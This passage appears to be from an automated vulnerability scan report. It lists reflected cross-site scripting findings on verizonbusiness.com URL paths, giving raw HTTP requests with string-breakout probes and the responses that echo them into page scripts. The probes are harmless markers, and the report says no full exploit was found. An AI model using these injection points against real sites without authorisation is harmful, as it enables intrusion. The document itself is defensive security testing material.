Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /about/news62f59'%3b76825451fb8/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:49:09 GMT
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 47083
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:49:09 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:49:09 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/about/news62f59';76825451fb8/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.351. http://www.verizonbusiness.com/about/news/fast/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /about/news/fast/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ef28e'%3ba87bcb04fba was submitted in the REST URL parameter 1. This input was echoed as ef28e';a87bcb04fba in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /aboutef28e'%3ba87bcb04fba/news/fast/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:51:59 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40632
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:52:00 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:51:59 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/aboutef28e';a87bcb04fba/news/fast/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.352. http://www.verizonbusiness.com/about/news/fast/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /about/news/fast/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 41438"%3b78c1125432 was submitted in the REST URL parameter 1. This input was echoed as 41438";78c1125432 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /about41438"%3b78c1125432/news/fast/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:51:35 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40628
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:51:35 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:51:35 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...
}

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/about41438";78c1125432/news/fast/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR S
...[SNIP]...

1.353. http://www.verizonbusiness.com/about/news/fast/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /about/news/fast/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f1410'%3bffd96023f2b was submitted in the REST URL parameter 2. This input was echoed as f1410';ffd96023f2b in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /about/newsf1410'%3bffd96023f2b/fast/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:52:44 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 47091
Date: Wed, 17 Nov 2010 00:52:45 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:52:44 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/about/newsf1410';ffd96023f2b/fast/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.354. http://www.verizonbusiness.com/about/news/fast/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /about/news/fast/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c9017"%3b07c9e1b7171 was submitted in the REST URL parameter 2. This input was echoed as c9017";07c9e1b7171 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /about/newsc9017"%3b07c9e1b7171/fast/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:52:21 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 47093
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:52:22 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:52:21 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link med
...[SNIP]...

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/about/newsc9017";07c9e1b7171/fast/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT
...[SNIP]...

1.355. http://www.verizonbusiness.com/about/news/fast/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /about/news/fast/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c3cd1"%3b3eab779db3 was submitted in the REST URL parameter 3. This input was echoed as c3cd1";3eab779db3 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /about/news/fastc3cd1"%3b3eab779db3/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:52:57 GMT
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 49737
Date: Wed, 17 Nov 2010 00:52:57 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:52:57 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/about/news/fastc3cd1";3eab779db3/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNC
...[SNIP]...

1.356. http://www.verizonbusiness.com/about/news/fast/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /about/news/fast/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload da11d'%3b9e784fdb48d was submitted in the REST URL parameter 3. This input was echoed as da11d';9e784fdb48d in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /about/news/fastda11d'%3b9e784fdb48d/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Last-Modified: Wed, 17 Nov 2010 00:53:04 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Content-Type: text/html; charset=UTF-8
Content-Length: 49739
Date: Wed, 17 Nov 2010 00:53:05 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:53:04 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/about/news/fastda11d';9e784fdb48d/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.357. http://www.verizonbusiness.com/about/news/globalarchive/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /about/news/globalarchive/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 14914"%3b22ba1048635 was submitted in the REST URL parameter 1. This input was echoed as 14914";22ba1048635 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /about14914"%3b22ba1048635/news/globalarchive/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:51:03 GMT
Content-Type: text/html
Content-Length: 40650
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:51:04 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:51:03 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link med
...[SNIP]...
}

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/about14914";22ba1048635/news/globalarchive/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEM
...[SNIP]...

1.358. http://www.verizonbusiness.com/about/news/globalarchive/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /about/news/globalarchive/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 209a7'%3b82f8e8ea37f was submitted in the REST URL parameter 1. This input was echoed as 209a7';82f8e8ea37f in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /about209a7'%3b82f8e8ea37f/news/globalarchive/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:51:25 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40648
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:51:25 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:51:25 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/about209a7';82f8e8ea37f/news/globalarchive/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.359. http://www.verizonbusiness.com/about/news/globalarchive/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /about/news/globalarchive/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7e83c"%3b0a7ccedfc7b was submitted in the REST URL parameter 2. This input was echoed as 7e83c";0a7ccedfc7b in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /about/news7e83c"%3b0a7ccedfc7b/globalarchive/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:52:00 GMT
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 47111
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:52:00 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:52:00 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/about/news7e83c";0a7ccedfc7b/globalarchive/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS
...[SNIP]...

1.360. http://www.verizonbusiness.com/about/news/globalarchive/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /about/news/globalarchive/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ba498'%3b597d7da9943 was submitted in the REST URL parameter 2. This input was echoed as ba498';597d7da9943 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /about/newsba498'%3b597d7da9943/globalarchive/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:52:31 GMT
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 47109
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:52:31 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:52:31 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/about/newsba498';597d7da9943/globalarchive/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.361. http://www.verizonbusiness.com/about/news/globalarchive/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /about/news/globalarchive/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d0f88"%3b5d15483965e was submitted in the REST URL parameter 3. This input was echoed as d0f88";5d15483965e in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /about/news/globalarchived0f88"%3b5d15483965e/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:52:44 GMT
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 49757
Date: Wed, 17 Nov 2010 00:52:44 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:52:44 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link med
...[SNIP]...
e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/about/news/globalarchived0f88";5d15483965e/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNC
...[SNIP]...

1.362. http://www.verizonbusiness.com/about/news/globalarchive/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /about/news/globalarchive/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3c420'%3b4d7a7d8e8bf was submitted in the REST URL parameter 3. This input was echoed as 3c420';4d7a7d8e8bf in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /about/news/globalarchive3c420'%3b4d7a7d8e8bf/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:52:53 GMT
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 49757
Date: Wed, 17 Nov 2010 00:52:53 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:52:53 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link med
...[SNIP]...
<script type="text/javascript">
var request='/about/news/globalarchive3c420';4d7a7d8e8bf/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.363. http://www.verizonbusiness.com/about/news/media/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /about/news/media/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 58838"%3b4ded86453f0 was submitted in the REST URL parameter 1. This input was echoed as 58838";4ded86453f0 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

